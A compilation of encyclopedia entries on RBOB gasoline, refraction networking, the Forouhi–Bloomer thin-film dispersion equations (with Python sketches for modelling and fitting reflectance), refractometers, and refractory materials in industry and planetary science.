Edwin Drake and other early oilmen discarded gasoline as a byproduct in the quest to refine crude oil into kerosene . [ citation needed ]
RBOB gasoline is a blend of hydrocarbons suitable for use in spark-ignition engines . It typically contains various additives, including oxygenates like ethanol or methyl tertiary butyl ether (MTBE), to improve octane rating and reduce air pollution. [ 2 ]
RBOB is refined from crude oil; since about half of each barrel of crude oil is refined into gasoline, RBOB tracks the price of WTI crude closely. [ 3 ] | https://en.wikipedia.org/wiki/Reformulated_Blendstock_for_Oxygenate_Blending
Refraction networking , also known as decoy routing , is a research anti-censorship approach that would allow users to circumvent a censor without using any individual proxy servers. [ 1 ] Instead, it implements proxy functionality at the core of partner networks, such as those of Internet service providers , outside the censored country. These networks would discreetly provide censorship circumvention for "any connection that passes through their networks." [ 2 ] This prevents censors from selectively blocking proxy servers and makes censorship more expensive, in a strategy similar to collateral freedom . [ 3 ] [ 4 ] [ 5 ]
The approach was independently invented by teams at the University of Michigan , the University of Illinois , and Raytheon BBN Technologies . There are five existing protocols: Telex , [ 6 ] TapDance, [ 7 ] Cirripede, [ 8 ] Curveball, [ 9 ] and Rebound. [ 10 ] These teams are now working together to develop and deploy refraction networking with support from the U.S. Department of State . [ 1 ] [ 3 ] | https://en.wikipedia.org/wiki/Refraction_networking
A. R. Forouhi and I. Bloomer deduced dispersion equations for the refractive index, n , and extinction coefficient, k , which were published in 1986 [ 1 ] and 1988. [ 2 ] The 1986 publication relates to amorphous materials, while the 1988 publication relates to crystalline. Subsequently, in 1991, their work was included as a chapter in The Handbook of Optical Constants . [ 3 ] The Forouhi–Bloomer dispersion equations describe how photons of varying energies interact with thin films. When used with a spectroscopic reflectometry tool, the Forouhi–Bloomer dispersion equations specify n and k for amorphous and crystalline materials as a function of photon energy E . Values of n and k as a function of photon energy, E , are referred to as the spectra of n and k , which can also be expressed as functions of the wavelength of light, λ , since E = hc / λ . The symbol h is the Planck constant and c , the speed of light in vacuum. Together, n and k are often referred to as the "optical constants" of a material (though they are not constants since their values depend on photon energy).
The derivation of the Forouhi–Bloomer dispersion equations is based on obtaining an expression for k as a function of photon energy, symbolically written as k ( E ), starting from first principles quantum mechanics and solid state physics. An expression for n as a function of photon energy, symbolically written as n ( E ), is then determined from the expression for k ( E ) in accordance to the Kramers–Kronig relations [ 4 ] which states that n ( E ) is the Hilbert transform of k ( E ).
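The Kramers–Kronig step can be approximated numerically. The sketch below uses the common form n(E) − n(∞) = (2/π) P∫₀^∞ E′ k(E′) / (E′² − E²) dE′ on a uniform grid and implements the principal value crudely by skipping the singular point; a production implementation would use a more careful quadrature.

```python
import numpy as np

def n_from_k_kramers_kronig(E, k, n_inf=1.0):
    """Crude Kramers-Kronig transform: n(E) from k(E) on a uniform energy grid.

    E     : uniformly spaced photon energies (eV), all positive
    k     : extinction coefficient sampled at the energies E
    n_inf : assumed high-energy limit of the refractive index
    """
    dE = E[1] - E[0]
    n = np.full(E.shape, n_inf, dtype=float)
    for i, Ei in enumerate(E):
        mask = np.arange(E.size) != i    # crude principal value: skip the pole
        n[i] += (2.0 / np.pi) * dE * np.sum(
            E[mask] * k[mask] / (E[mask] ** 2 - Ei ** 2))
    return n
```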
The Forouhi–Bloomer dispersion equations for n ( E ) and k ( E ) of amorphous materials are given as: k ( E ) = A ( E − E g ) 2 E 2 − B E + C , {\displaystyle k(E)={\frac {A\left(E-E_{\mathrm {g} }\right)^{2}}{E^{2}-BE+C}},} n ( E ) = n ( ∞ ) + B 0 E + C 0 E 2 − B E + C . {\displaystyle n(E)=n(\infty )+{\frac {B_{0}E+C_{0}}{E^{2}-BE+C}}.}
The five parameters A , B , C , E g , and n (∞) each have physical significance. [ 1 ] [ 3 ] E g is the optical energy band gap of the material. A , B , and C depend on the band structure of the material. They are positive constants such that 4 C − B 2 > 0. Finally, n (∞), a constant greater than unity, represents the value of n at E = ∞. The parameters B 0 and C 0 in the equation for n ( E ) are not independent parameters, but depend on A , B , C , and E g . They are given by: B 0 = A Q ( − B 2 2 + E g B − E g 2 + C ) , {\displaystyle B_{0}={\frac {A}{Q}}\left(-{\frac {B^{2}}{2}}+E_{\mathrm {g} }B-E_{\mathrm {g} }^{2}+C\right),} C 0 = A Q ( ( E g 2 + C ) B 2 − 2 E g C ) , {\displaystyle C_{0}={\frac {A}{Q}}\left(\left(E_{\mathrm {g} }^{2}+C\right){\frac {B}{2}}-2E_{\mathrm {g} }C\right),}
where Q = 1 2 4 C − B 2 . {\displaystyle Q={\frac {1}{2}}{\sqrt {4C-B^{2}}}.}
Thus, for amorphous materials, a total of five parameters are sufficient to fully describe the dependence of both n and k on photon energy, E .
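For concreteness, the five-parameter amorphous model can be evaluated directly. The following sketch implements the equations above; the parameter values in the example are arbitrary illustrative numbers, not fitted constants for any real material.

```python
import numpy as np

def forouhi_bloomer_amorphous(E, A, B, C, Eg, n_inf):
    """n(E) and k(E) for an amorphous film from the five-parameter model.

    E is the photon energy in eV; A, B, C must satisfy 4*C - B**2 > 0,
    which also keeps the shared denominator strictly positive.
    """
    Q = 0.5 * np.sqrt(4 * C - B**2)
    B0 = (A / Q) * (-(B**2) / 2 + Eg * B - Eg**2 + C)
    C0 = (A / Q) * ((Eg**2 + C) * B / 2 - 2 * Eg * C)
    denom = E**2 - B * E + C
    k = A * (E - Eg) ** 2 / denom
    n = n_inf + (B0 * E + C0) / denom
    return n, k

E = np.linspace(1.5, 6.5, 500)   # roughly 190-830 nm expressed in eV
n, k = forouhi_bloomer_amorphous(E, A=0.2, B=8.0, C=17.0, Eg=1.6, n_inf=1.5)
```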
For crystalline materials which have multiple peaks in their n and k spectra, the Forouhi–Bloomer dispersion equations can be extended as follows: k ( E ) = ∑ i = 1 q A i ( E − E g i ) 2 E 2 − B i E + C i , {\displaystyle k(E)=\sum _{i=1}^{q}{\frac {A_{i}\left(E-E_{\mathrm {g} i}\right)^{2}}{E^{2}-B_{i}E+C_{i}}},} n ( E ) = n ( ∞ ) + ∑ i = 1 q B 0 i E + C 0 i E 2 − B i E + C i . {\displaystyle n(E)=n(\infty )+\sum _{i=1}^{q}{\frac {B_{0i}E+C_{0i}}{E^{2}-B_{i}E+C_{i}}}.}
The number of terms in each sum, q , is equal to the number of peaks in the n and k spectra of the material. Every term in the sum has its own values of the parameters A , B , C , E g , as well as its own values of B 0 and C 0 . Analogous to the amorphous case, the terms all have physical significance. [ 2 ] [ 3 ]
The refractive index ( n ) and extinction coefficient ( k ) are related to the interaction between a material and incident light, and are associated with refraction and absorption (respectively). They can be considered as the "fingerprint of the material". Thin film material coatings on various substrates provide important functionalities for the microfabrication industry , and the n , k , as well as the thickness, t , of these thin film constituents must be measured and controlled to allow for repeatable manufacturing .
The Forouhi–Bloomer dispersion equations for n and k were originally expected to apply to semiconductors and dielectrics, whether in amorphous, polycrystalline, or crystalline states. However, they have been shown to describe the n and k spectra of transparent conductors, [ 5 ] as well as metallic compounds. [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] The formalism for crystalline materials was found to also apply to polymers, [ 16 ] [ 17 ] [ 18 ] which consist of long chains of molecules that do not form a crystallographic structure in the classical sense.
Other dispersion models that can be used to derive n and k , such as the Tauc–Lorentz model , can be found in the literature. [ 19 ] [ 20 ] Two well-known models— Cauchy and Sellmeier —provide empirical expressions for n valid over a limited measurement range, and are only useful for non-absorbing films where k =0. Consequently, the Forouhi–Bloomer formulation has been used for measuring thin films in various applications. [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ]
In the following discussions, all variables of photon energy, E , will be described in terms of wavelength of light, λ , since experimentally variables involving thin films are typically measured over a spectrum of wavelengths. The n and k spectra of a thin film cannot be measured directly, but must be determined indirectly from measurable quantities that depend on them. Spectroscopic reflectance, R ( λ ), is one such measurable quantity. Another is spectroscopic transmittance, T ( λ ), applicable when the substrate is transparent. Spectroscopic reflectance of a thin film on a substrate represents the ratio of the intensity of light reflected from the sample to the intensity of incident light, measured over a range of wavelengths, whereas spectroscopic transmittance, T ( λ ), represents the ratio of the intensity of light transmitted through the sample to the intensity of incident light, measured over a range of wavelengths; typically, there will also be a reflected signal, R ( λ ), accompanying T ( λ ).
The measurable quantities, R ( λ ) and T ( λ ) depend not only on n ( λ ) and k ( λ ) of the film, but also on film thickness, t , and n ( λ ) and k ( λ ) of the substrate. For a silicon substrate, the n ( λ ) and k ( λ ) values are known and are taken as a given input. The challenge of characterizing thin films involves extracting t , n ( λ ) and k ( λ ) of the film from the measurement of R ( λ ) and/or T ( λ ). This can be achieved by combining the Forouhi–Bloomer dispersion equations for n ( λ ) and k ( λ ) with the Fresnel equations for the reflection and transmission of light at an interface [ 21 ] to obtain theoretical, physically valid, expressions for reflectance and transmittance. In so doing, the challenge is reduced to extracting the five parameters A , B , C , E g , and n (∞) that constitute n ( λ ) and k ( λ ), along with film thickness, t , by using a nonlinear least squares regression analysis [ 22 ] [ 23 ] fitting procedure. The fitting procedure entails an iterative improvement of the values of A , B , C , E g , n (∞), t , in order to reduce the sum of the squares of the errors between the theoretical R ( λ ) or theoretical T ( λ ) and the measured spectrum of R ( λ ) or T ( λ ).
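A minimal version of this regression can be sketched with scipy, reusing the forouhi_bloomer_amorphous helper from the earlier sketch. The optical model below is the standard single-film Fresnel (Airy) reflectance at normal incidence with the ñ = n − ik convention; the substrate index, the starting guesses, and the bounds are illustrative assumptions, and a real instrument's analysis would add parameter constraints (for example enforcing 4C − B² > 0), data weighting, and a fuller optical model.

```python
import numpy as np
from scipy.optimize import least_squares

HC_EV_NM = 1239.84   # photon energy E (eV) = HC_EV_NM / wavelength (nm)

def model_reflectance(params, wl_nm, N_sub):
    """Normal-incidence reflectance of a single absorbing film on a substrate."""
    A, B, C, Eg, n_inf, t_nm = params
    E = HC_EV_NM / wl_nm
    n, k = forouhi_bloomer_amorphous(E, A, B, C, Eg, n_inf)
    N1 = n - 1j * k                          # film index, convention N = n - ik
    r01 = (1.0 - N1) / (1.0 + N1)            # air/film interface
    r12 = (N1 - N_sub) / (N1 + N_sub)        # film/substrate interface
    beta = 2.0 * np.pi * N1 * t_nm / wl_nm   # complex phase thickness
    r = (r01 + r12 * np.exp(-2j * beta)) / (1.0 + r01 * r12 * np.exp(-2j * beta))
    return np.abs(r) ** 2

def fit_film(wl_nm, R_meas, N_sub, x0):
    """Iteratively adjust A, B, C, Eg, n(inf), and thickness t to match R."""
    residuals = lambda p: model_reflectance(p, wl_nm, N_sub) - R_meas
    return least_squares(residuals, x0, bounds=([0, 0, 0, 0, 1, 0], np.inf))

# Hypothetical usage, with wl and R_meas as measured arrays and N_si the
# known complex index of a silicon substrate at each wavelength:
# result = fit_film(wl, R_meas, N_si, x0=[0.2, 8.0, 17.0, 1.6, 1.5, 100.0])
```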
Besides spectroscopic reflectance and transmittance, spectroscopic ellipsometry can also be used in an analogous way to characterize thin films and determine t , n ( λ ) and k ( λ ).
The following examples show the versatility of using the Forouhi–Bloomer dispersion equations to characterize thin films using a tool based on near-normal incident spectroscopic reflectance. Near-normal spectroscopic transmittance is also used when the substrate is transparent. The n ( λ ) and k ( λ ) spectra of each film are obtained along with film thickness, over a wide range of wavelengths from deep ultraviolet to near infrared wavelengths (190–1000 nm).
In the following examples, the notation for theoretical and measured reflectance in the spectral plots is expressed as "R-theor" and "R-meas", respectively.
Below are schematics depicting the thin film measurement process:
The Forouhi–Bloomer dispersion equations in combination with Rigorous Coupled-Wave Analysis (RCWA) have also been used to obtain detailed profile information (depth, CD, sidewall angle) of trench structures. In order to extract structure information, polarized broadband reflectance data, Rs and Rp , must be collected over a large wavelength range from a periodic structure (grating), and then analyzed with a model that incorporates Forouhi–Bloomer dispersion equations and RCWA. Inputs into the model include grating pitch and n and k spectra of all materials within the structure, while outputs can include Depth, CDs at multiple locations, and even sidewall angle. The n and k spectra of such materials can be obtained in accordance with the methodology described in this section for thin film measurements.
Below are schematics depicting the measurement process for trench structures. Examples of trench measurements then follow.
Example 1 shows one broad maximum in the n(λ) and k(λ) spectra of the a-Si film, as is expected for amorphous materials. As a material transitions toward crystallinity, the broad maximum gives way to several sharper peaks in its n(λ) and k(λ) spectra, as demonstrated in the graphics.
When the measurement involves two or more films in a stack of films, the theoretical expression for reflectance must be expanded to include the n ( λ ) and k ( λ ) spectra, plus thickness, t , of each film. However, the regression may not converge to unique values of the parameters, due to the non-linear nature of the expression for reflectance. So it is helpful to eliminate some of the unknowns. For example, the n ( λ ) and k ( λ ) spectra of one or more of the films may be known from the literature or previous measurements, and held fixed (not allowed to vary) during the regression. To obtain the results shown in Example 1, the n ( λ ) and k ( λ ) spectra of the SiO 2 layer was fixed, and the other parameters, n ( λ ) and k ( λ ) of a-Si, plus thicknesses of both a-Si and SiO 2 were allowed to vary.
Polymers such as photoresist consist of long chains of molecules which do not form a crystallographic structure in the classic sense. However, their n ( λ ) and k ( λ ) spectra exhibit several sharp peaks rather than a broad maximum expected for non-crystalline materials. Thus, the measurement results for a polymer are based on the Forouhi–Bloomer formulation for crystalline materials. Most of the structure in the n ( λ ) and k ( λ ) spectra occurs in the deep UV wavelength range and thus to properly characterize a film of this nature, it is necessary that the measured reflectance data in the deep UV range is accurate.
The figure shows a measurement example of a photoresist (polymer) material used for 248 nm micro-lithography. Six terms were used in the Forouhi–Bloomer equations for crystalline materials to fit the data and achieve the results.
Indium tin oxide (ITO) is a conducting material with the unusual property that it is transparent, so it is widely used in the flat panel display industry. Reflectance and transmittance measurements of the uncoated glass substrate were needed in order to determine the previously unknown n ( λ ) and k ( λ ) spectra of the glass. The reflectance and transmittance of ITO deposited on the same glass substrate were then measured simultaneously, and analyzed using the Forouhi–Bloomer equations.
As expected, the k ( λ ) spectrum of ITO is zero in the visible wavelength range, since ITO is transparent. The behavior of the k ( λ ) spectrum of ITO in the near-infrared (NIR) and infrared (IR) wavelength ranges resembles that of a metal: non-zero in the NIR range of 750–1000 nm (difficult to discern in the graphics since its values are very small) and reaching a maximum value in the IR range ( λ > 1000 nm). The average k value of the ITO film in the NIR and IR range is 0.05.
When dealing with complex films, in some instances the parameters cannot be resolved uniquely. To constrain the solution to a set of unique values, a technique involving multi-spectral analysis can be used. In the simplest case, this entails depositing the film on two different substrates and then simultaneously analyzing the results using the Forouhi–Bloomer dispersion equations.
For example, the single measurement of reflectance in 190–1000 nm range of Ge 40 Se 60 /Si does not provide unique n ( λ ) and k ( λ ) spectra of the film. However, this problem can be solved by depositing the same Ge 40 Se 60 film on another substrate, in this case oxidized silicon, and then simultaneously analyzing the measured reflectance data to determine:
The trench structure depicted in the adjacent diagram repeats itself in 160 nm intervals, that is, it has a given pitch of 160 nm. The trench is composed of the following materials:
Accurate n and k values of these materials are necessary in order to analyze the structure. Often a blanket area on the trench sample with the film of interest is present for the measurement. In this example, the reflectance spectrum of the poly-silicon was measured on a blanket area containing the poly-silicon, from which its n and k spectra were determined in accordance with the methodology described in this article that uses the Forouhi–Bloomer dispersion equations. Fixed tables of n and k values were used for the SiO 2 and Si 3 N 4 films.
Combining the n and k spectra of the films with Rigorous Coupled-Wave Analysis (RCWA) the following critical parameters were determined (with measured results as well): | https://en.wikipedia.org/wiki/Refractive_index_and_extinction_coefficient_of_thin_film_materials |
A refractometer is a laboratory or field device for the measurement of an index of refraction ( refractometry ). The index of refraction is calculated from the observed refraction angle using Snell's law . For mixtures, the index of refraction then allows the concentration to be determined using mixing rules such as the Gladstone–Dale relation and Lorentz–Lorenz equation .
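As a simple illustration of such a mixing rule, the Gladstone–Dale relation for a binary liquid treats n − 1 as additive in the volume fractions of the components; the sketch below inverts it to estimate concentration from a measured index. The component indices here are illustrative values; practical instruments rely on empirical calibrations such as Brix tables.

```python
def volume_fraction_from_index(n_mix, n_solvent, n_solute):
    """Invert the Gladstone-Dale mixing rule for a two-component liquid.

    Gladstone-Dale: n_mix - 1 = phi*(n_solute - 1) + (1 - phi)*(n_solvent - 1),
    where phi is the volume fraction of the solute.
    """
    return (n_mix - n_solvent) / (n_solute - n_solvent)

# Illustrative: measured index 1.3540 for a sugar solution, assuming
# n_water = 1.3330 and an effective n_sugar = 1.5000.
phi = volume_fraction_from_index(1.3540, 1.3330, 1.5000)
print(f"estimated solute volume fraction: {phi:.3f}")   # about 0.126
```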
Standard refractometers measure the extent of light refraction (as part of a refractive index) of transparent substances in either a liquid or solid state; this is then used to identify a liquid sample, analyze the sample's purity, and determine the amount or concentration of dissolved substances within the sample. As light passes into the liquid from the air it slows down and creates a 'bending' illusion; the severity of the 'bend' depends on the amount of substance dissolved in the liquid, for example, the amount of sugar in a glass of water. [ 1 ]
There are four main types of refractometers: traditional handheld refractometers , digital handheld refractometers , laboratory or Abbe refractometers (named for their inventor, Ernst Abbe , and based on his original critical-angle design) and inline process refractometers . [ 2 ] There is also the Rayleigh refractometer, used (typically) for measuring the refractive indices of gases.
In laboratory medicine , a refractometer is used to measure the total plasma protein in a blood sample and urine specific gravity in a urine sample.
In drug diagnostics , a refractometer is used to measure the specific gravity of human urine.
In gemology , the gemstone refractometer is one of the fundamental pieces of equipment used in a gemological laboratory. Gemstones are transparent minerals and can therefore be examined using optical methods. Refractive index is a material constant, dependent on the chemical composition of a substance. The refractometer is used to help identify gem materials by measuring their refractive index, one of the principal properties used in determining the type of a gemstone. Due to the dependence of the refractive index on the wavelength of the light used ( i.e. dispersion ), the measurement is normally taken at the wavelength of the sodium D-line (Na D ) of ~589 nm. This is either filtered out from daylight or generated with a monochromatic light-emitting diode ( LED ). Certain stones such as rubies, sapphires, tourmalines and topaz are optically anisotropic . They demonstrate birefringence based on the polarisation plane of the light. The two different refractive indices are distinguished using a polarisation filter. Gemstone refractometers are available both as classic optical instruments and as electronic measurement devices with a digital display . [ 3 ]
In marine aquarium keeping, a refractometer is used to measure the salinity and specific gravity of the water.
In the automobile industry , a refractometer is used to measure the coolant concentration.
In the machine industry , a refractometer is used to measure the amount of coolant concentrate that has been added to the water-based coolant for the machining process.
In homebrewing , a brewing refractometer is used to measure the specific gravity before fermentation to determine the amount of fermentable sugars which will potentially be converted to alcohol.
Brix refractometers are often used by hobbyists for making preserves including jams, marmalades and honey. In beekeeping , a brix refractometer is used to measure the amount of water in honey.
Automatic refractometers measure the refractive index of a sample automatically. The measurement is based on the determination of the critical angle of total reflection.
A light source, usually a long-life LED, is focused onto a prism surface via a lens system. An interference filter guarantees the specified wavelength. Because the light is focused to a spot on the prism surface, a wide range of incidence angles is covered.
As shown in the figure "Schematic setup of an automatic refractometer", the measured sample is in direct contact with the measuring prism. Depending on its refractive index, the incoming light below the critical angle of total reflection is partly transmitted into the sample, whereas for higher angles of incidence the light is totally reflected. This dependence of the reflected light intensity on the incident angle is measured with a high-resolution sensor array . From the video signal taken with the CCD sensor, the refractive index of the sample can be calculated.
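The relation behind this measurement is Snell's law at the prism–sample interface: at the critical angle the refracted ray grazes the interface, so n_sample = n_prism · sin(θ_c). The sketch below illustrates this geometry; the prism index is an assumption chosen only for illustration (sapphire, a common prism material, is roughly 1.77 near 589 nm).

```python
import math

def sample_index_from_critical_angle(theta_c_deg, n_prism):
    """Snell's law at the prism/sample interface: at the critical angle the
    refracted ray grazes the interface (90 degrees), so n_sample = n_prism * sin(theta_c)."""
    return n_prism * math.sin(math.radians(theta_c_deg))

def critical_angle_deg(n_sample, n_prism):
    """Angle of incidence beyond which the light is totally reflected."""
    return math.degrees(math.asin(n_sample / n_prism))

n_prism = 1.77                                 # illustrative prism index (sapphire ~1.77 near 589 nm)
theta_c = critical_angle_deg(1.3330, n_prism)  # ~48.9 degrees for water
print(theta_c)
print(sample_index_from_critical_angle(theta_c, n_prism))   # recovers ~1.3330
```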
This method of detecting the angle of total reflection is independent of the sample properties. It is even possible to measure the refractive index of optically dense, strongly absorbing samples or samples containing air bubbles or solid particles . Furthermore, only a few microliters are required and the sample can be recovered. This determination of the refraction angle is independent of vibrations and other environmental disturbances.
The refractive index of a given sample varies with wavelength for all materials. This dispersion relation is nonlinear and is characteristic for every material. In the visible range, the refractive index decreases with increasing wavelength. In glass prisms very little absorption is observable. In the infrared wavelength range several absorption maxima and fluctuations in the refractive index appear. To guarantee a high-quality measurement with an accuracy of up to 0.00002 in refractive index, the wavelength has to be determined correctly. Therefore, in modern refractometers the wavelength is tuned to a bandwidth of ±0.2 nm to ensure correct results for samples with different dispersions.
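A rough back-of-the-envelope check of why a ±0.2 nm wavelength tolerance is compatible with an index accuracy of 2×10⁻⁵: fit a two-term Cauchy dispersion law to approximate literature values for water and evaluate the index change caused by a 0.2 nm shift near the sodium D line. The Cauchy coefficients derived here are illustrative, not instrument calibration data.

```python
# Two-term Cauchy dispersion n(lam) = A + B/lam**2 (lam in nm), fitted to
# approximate literature values for water at the Fraunhofer F and C lines.
lam_F, n_F = 486.1, 1.3371
lam_C, n_C = 656.3, 1.3312
B = (n_F - n_C) / (1.0 / lam_F**2 - 1.0 / lam_C**2)   # roughly 3.1e3 nm^2
A = n_F - B / lam_F**2

def n_water(lam_nm):
    return A + B / lam_nm**2

lam_D = 589.3                                          # sodium D line
dn = abs(n_water(lam_D + 0.2) - n_water(lam_D))        # index error from a 0.2 nm wavelength error
print(f"n(589.3 nm) ~ {n_water(lam_D):.4f}")           # ~1.3329, close to the accepted ~1.3330
print(f"|dn| for a 0.2 nm shift ~ {dn:.1e}")           # ~6e-6, below the 2e-5 accuracy quoted above
```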
Temperature has a very important influence on the refractive index measurement. Therefore, the temperature of the prism and the temperature of the sample have to be controlled with high precision. There are several subtly-different designs for controlling the temperature; but there are some key factors common to all, such as high-precision temperature sensors and Peltier devices to control the temperature of the sample and the prism. The temperature control of these devices should be designed so that the variation in sample temperature is small enough that it will not cause a detectable refractive-index change.
External water baths were used in the past but are no longer needed.
Automatic refractometers are microprocessor-controlled electronic devices. This means they can have a high degree of automation and can also be combined with other measuring devices.
There are different types of sample cells available, ranging from a flow cell for a few microliters to sample cells with a filling funnel for fast sample exchange without cleaning the measuring prism in between. The sample cells can also be used for the measurement of poisonous and toxic samples with minimum exposure to the sample.
Micro cells require only a few microliters volume, assure good recovery of expensive samples and prevent evaporation of volatile samples or solvents. They can also be used in automated systems for automatic filling of the sample onto the refractometer prism.
For convenient filling of the sample through a funnel, flow cells with a filling funnel are available. These are used for fast sample exchange in quality control applications.
Once an automatic refractometer is equipped with a flow cell, the sample can either be filled by means of a syringe or by using a peristaltic pump. Modern refractometers have the option of a built-in peristaltic pump. This is controlled via the instrument's software menu. A peristaltic pump opens the way to monitor batch processes in the laboratory or perform multiple measurements on one sample without any user interaction. This eliminates human error and assures a high sample throughput.
If an automated measurement of a large number of samples is required, modern automatic refractometers can be combined with an automatic sample changer. The sample changer is controlled by the refractometer and assures fully automated measurement of the samples placed in the vials of the sample changer.
Today's laboratories want to measure not only the refractive index of samples but also several additional parameters, such as density or viscosity, to perform efficient quality control. Due to the microprocessor control and a number of interfaces, automatic refractometers are able to communicate with computers or other measuring devices, e.g. density meters, pH meters or viscosity meters, to store refractive index data and density data (and other parameters) in one database.
Automatic refractometers not only measure the refractive index but also offer additional software features, such as
Refractometers are often used in pharmaceutical applications for quality control of raw, intermediate and final products. The manufacturers of pharmaceuticals have to follow several international regulations such as FDA 21 CFR Part 11, GMP, GAMP 5 and USP <1058>, which require a lot of documentation work. The manufacturers of automatic refractometers support these users by providing instrument software that fulfills the requirements of 21 CFR Part 11, with user levels, electronic signatures and an audit trail. Furthermore, Pharma Validation and Qualification Packages are available containing | https://en.wikipedia.org/wiki/Refractometer
In materials science , a refractory (or refractory material ) is a material that is resistant to decomposition by heat or chemical attack and that retains its strength and rigidity at high temperatures . [ 1 ] They are inorganic , non-metallic compounds that may be porous or non-porous, and their crystallinity varies widely: they may be crystalline , polycrystalline , amorphous , or composite . They are typically composed of oxides , carbides or nitrides of the following elements: silicon , aluminium , magnesium , calcium , boron , chromium and zirconium . [ 2 ] Many refractories are ceramics , but some such as graphite are not, and some ceramics such as clay pottery are not considered refractory. Refractories are distinguished from the refractory metals , which are elemental metals and their alloys that have high melting temperatures.
Refractories are defined by ASTM C71 as "non-metallic materials having those chemical and physical properties that make them applicable for structures, or as components of systems, that are exposed to environments above 1,000 °F (811 K; 538 °C)". [ 3 ] Refractory materials are used in furnaces , kilns , incinerators , and reactors . Refractories are also used to make crucibles and molds for casting glass and metals. The iron and steel industry and metal casting sectors use approximately 70% of all refractories produced. [ 4 ]
Refractory materials must be chemically and physically stable at high temperatures. Depending on the operating environment, they must be resistant to thermal shock , be chemically inert , and/or have specific ranges of thermal conductivity and of the coefficient of thermal expansion .
The oxides of aluminium ( alumina ), silicon ( silica ) and magnesium ( magnesia ) are the most important materials used in the manufacturing of refractories. Another oxide usually found in refractories is the oxide of calcium ( lime ). [ 5 ] Fire clays are also widely used in the manufacture of refractories.
Refractories must be chosen according to the conditions they face. Some applications require special refractory materials. [ 6 ] Zirconia is used when the material must withstand extremely high temperatures. [ 7 ] Silicon carbide and carbon ( graphite ) are two other refractory materials used in some very severe temperature conditions, but they cannot be used in contact with oxygen , as they would oxidize and burn.
Binary compounds such as tungsten carbide or boron nitride can be very refractory. Hafnium carbide is the most refractory binary compound known, with a melting point of 3890 °C. [ 8 ] [ 9 ] The ternary compound tantalum hafnium carbide has one of the highest melting points of all known compounds (4215 °C). [ 10 ] [ 11 ]
Molybdenum disilicide has a high melting point of 2030 °C and is often used as a heating element .
Refractory materials are useful for the following functions: [ 12 ] [ 2 ]
Refractories have multiple useful applications. In the metallurgy industry, refractories are used for lining furnaces, kilns, reactors, and other vessels which hold and transport hot media such as metal and slag . Refractories have other high temperature applications such as fired heaters, hydrogen reformers, ammonia primary and secondary reformers, cracking furnaces, utility boilers, catalytic cracking units, air heaters, and sulfur furnaces. [ 12 ] They are used for surfacing flame deflectors in rocket launch structures. [ 13 ]
Refractories are classified in multiple ways, based on:
Acidic refractories are generally impervious to acidic materials but easily attacked by basic materials, and are thus used with acidic slag in acidic environments. They include substances such as silica , alumina , and fire clay brick refractories. Notable reagents that can attack both alumina and silica are hydrofluoric acid, phosphoric acid, and fluorinated gases (e.g. HF, F 2 ). [ 14 ] At high temperatures, acidic refractories may also react with limes and basic oxides.
Basic refractories are used in areas where slags and atmosphere are basic. They are stable to alkaline materials but can react with acids, which is important e.g. when removing phosphorus from pig iron (see Gilchrist–Thomas process ). The main raw materials belong to the RO group, of which magnesia (MgO) is a common example. Other examples include dolomite and chrome-magnesia. For the first half of the twentieth century, the steel making process used artificial periclase (roasted magnesite ) as a furnace lining material.
These are used in areas where slags and atmosphere are either acidic or basic and are chemically stable to both acids and bases. The main raw materials belong to, but are not confined to, the R 2 O 3 group. Common examples of these materials are alumina (Al 2 O 3 ), chromia (Cr 2 O 3 ) and carbon. [ 2 ]
Refractory objects are manufactured in standard shapes and special shapes. Standard shapes have dimensions that conform to conventions used by refractory manufacturers and are generally applicable to kilns or furnaces of the same types. Standard shapes are usually bricks that have a standard dimension of 9 in × 4.5 in × 2.5 in (229 mm × 114 mm × 64 mm) and this dimension is called a "one brick equivalent". "Brick equivalents" are used in estimating how many refractory bricks it takes to make an installation into an industrial furnace. There are ranges of standard shapes of different sizes manufactured to produce walls, roofs, arches, tubes and circular apertures etc. Special shapes are specifically made for specific locations within furnaces and for particular kilns or furnaces. Special shapes are usually less dense and therefore less hard wearing than standard shapes.
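As a small arithmetic illustration of the "brick equivalent" estimate described above (assuming, purely for illustration, a hypothetical 40 cubic-foot wall section and ignoring mortar joints, cutting waste and special shapes):

```python
# One "brick equivalent" is the volume of a standard 9 in x 4.5 in x 2.5 in brick.
BRICK_EQUIVALENT_IN3 = 9.0 * 4.5 * 2.5   # 101.25 cubic inches

def brick_equivalents(lining_volume_ft3):
    """Rough count of standard bricks for a lining of the given volume,
    ignoring mortar joints, cutting waste and special shapes."""
    return lining_volume_ft3 * 12**3 / BRICK_EQUIVALENT_IN3

print(round(brick_equivalents(40)))   # hypothetical 40 ft^3 wall section -> ~683 brick equivalents
```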
These are without prescribed form and are only given shape upon application. These types are known as monolithic refractories. Common examples include plastic masses, ramming masses , castables, gunning masses, fettling mix, and mortars.
Dry vibration linings often used in induction furnace linings are also monolithic, and sold and transported as a dry powder, usually with a magnesia/alumina composition with additions of other chemicals for altering specific properties. They are also finding more applications in blast furnace linings, although this use is still rare.
Refractory materials are classified into three types based on fusion temperature (melting point).
Refractoriness is the ability of a multiphase refractory to withstand high temperatures without load before reaching a specific degree of softening; it is measured with a pyrometric cone equivalent (PCE) test. Refractories are classified as: [ 2 ]
Refractories may be classified by thermal conductivity as either conducting, nonconducting, or insulating. Examples of conducting refractories are silicon carbide (SiC) and zirconium carbide (ZrC), whereas examples of nonconducting refractories are silica and alumina. Insulating refractories include calcium silicate materials, kaolin , and zirconia.
Insulating refractories are used to reduce the rate of heat loss through furnace walls. These refractories have low thermal conductivity due to a high degree of porosity, with a desired porous structure of small, uniform pores evenly distributed throughout the refractory brick in order to minimize thermal conductivity. Insulating refractories can be further classified into four types: [ 2 ] | https://en.wikipedia.org/wiki/Refractory |
In planetary science , any material that has a relatively high equilibrium condensation temperature is called refractory . [ 1 ] The opposite of refractory is volatile .
The refractory group includes elements and compounds like metals and silicates (commonly termed rocks) which make up the bulk of the mass of the terrestrial planets and asteroids in the inner belt. A fraction of the mass of other asteroids , giant planets, their moons and trans-Neptunian objects is also made of refractory materials. [ 2 ]
The elements can be divided into several categories: [ 1 ]
